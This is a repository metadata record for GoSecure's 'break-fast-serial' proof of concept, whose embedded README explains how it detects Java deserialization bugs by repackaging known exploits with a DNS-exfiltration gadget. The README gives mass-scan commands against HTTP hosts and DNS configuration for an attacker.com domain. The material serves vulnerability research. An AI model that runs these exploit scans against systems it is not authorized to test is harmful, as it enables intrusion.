{"id":18303530,"url":"https://github.com/gosecure/break-fast-serial","last_synced_at":"2025-04-05T15:30:58.439Z","repository":{"id":97083208,"uuid":"85815425","full_name":"GoSecure/break-fast-serial","owner":"GoSecure","description":"A proof of concept that demonstrates asynchronous scanning for Java deserialization bugs","archived":false,"fork":false,"pushed_at":"2017-03-27T21:34:22.000Z","size":33,"stargazers_count":54,"open_issues_count":0,"forks_count":16,"subscribers_count":7,"default_branch":"master","last_synced_at":"2025-03-21T06:33:24.758Z","etag":null,"topics":["exploit","java","security","serialization","tool","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/GoSecure.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-03-22T10:35:16.000Z","updated_at":"2023-03-13T03:49:30.000Z","dependencies_parsed_at":null,"dependency_job_id":"512ca24f-60b9-4513-84cb-752f227be110","html_url":"https://github.com/GoSecure/break-fast-serial","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GoSecure%2Fbreak-fast-serial","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GoSecure%2Fbreak-fast-serial/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GoSecure%2Fbreak-fast-serial/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GoSecure%2Fbreak-fast-serial/man
ifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/GoSecure","download_url":"https://codeload.github.com/GoSecure/break-fast-serial/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247358446,"owners_count":20926219,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploit","java","security","serialization","tool","vulnerability"],"created_at":"2024-11-05T15:25:56.953Z","updated_at":"2025-04-05T15:30:58.433Z","avatar_url":"https://github.com/GoSecure.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Break Fast Serial\n\nA proof of concept that demonstrates asynchronous scanning of deserialization bugs. It repackages [well known exploits](https://github.com/breenmachine/JavaUnserializeExploits) with a modified gadget that triggers DNS queries.\n\nDetailed explanation: http://gosecure.net/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/\n\n## DNS Chef configuration\n\nThe DNS Chef instance is a requirement to see the results of the scan.\n\nThis is the typical DNS configuration expected on your domain registrar. 
It tells other DNS servers that all subdomains of `attacker.com` must be resolved by the DNS server hosted at `10.11.12.13`.\n```\nNS scanme.attacker.com dnschef.attacker.com\nA dnschef.attacker.com 10.11.12.13\n```\n\n - `10.11.12.13` : The public IP address that is \n - `attacker.com` : A domain name you own\n\nIt is highly recommended to use this [modified version of DNS Chef](./dnschef) that decodes the metadata placed by the scanner.\n\n## Single IP scan\n\nLaunch DNSChef\n```\npython dnschef.py -q --fakeip 127.0.0.1 -i 0.0.0.0\n```\n\nLaunch the scanner\n```\npython breakfast.py -t 192.168.40.1 -p 7001 -d scanme.attacker.com\n```\n\n## Mass Scan\n\nBuild a list of IP addresses/hostnames with open **HTTP** ports. Use a port scanner such as Nmap to identify ports that respond to HTTP.\n```\n$ cat list_servers.txt\n192.168.40.10:80\n192.168.40.24:8181\n192.168.40.100:7001\n192.168.40.100:8080\n192.168.40.102:8080\n192.168.40.102:8001\n```\n\nLaunch DNSChef\n```\npython dnschef.py -q --fakeip 127.0.0.1 -i 0.0.0.0\n```\n\nLaunch the scanner\n```\ncat list_servers.txt | python breakfast.py -stdin -d scanme.attacker.com\n```\n\n## Expected response\n\nIf the vulnerability is confirmed, the expected trace from DNS Chef is as follows.\n\n```\n['843', 'jboss', '192.168.40.24', '8181']\n[06:16:44] 69.165.172.165: cooking the response of type 'A' for 3834333a6a626f73733a3132372e302e302e313a38313831.scanme.fsociety.com to 127.0.0.1\n['914', 'jenkins-cli', '192.168.40.102', '8080']\n[06:16:45] 173.194.103.14: cooking the response of type 'A' for 3931343a6a656e6b696e732d636c693a3132372e302e302e313a38303830.scanme.fsociety.com to 127.0.0.1\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgosecure%2Fbreak-fast-serial","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgosecure%2Fbreak-fast-serial","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgosecure%2Fbreak-fast-serial/lists"}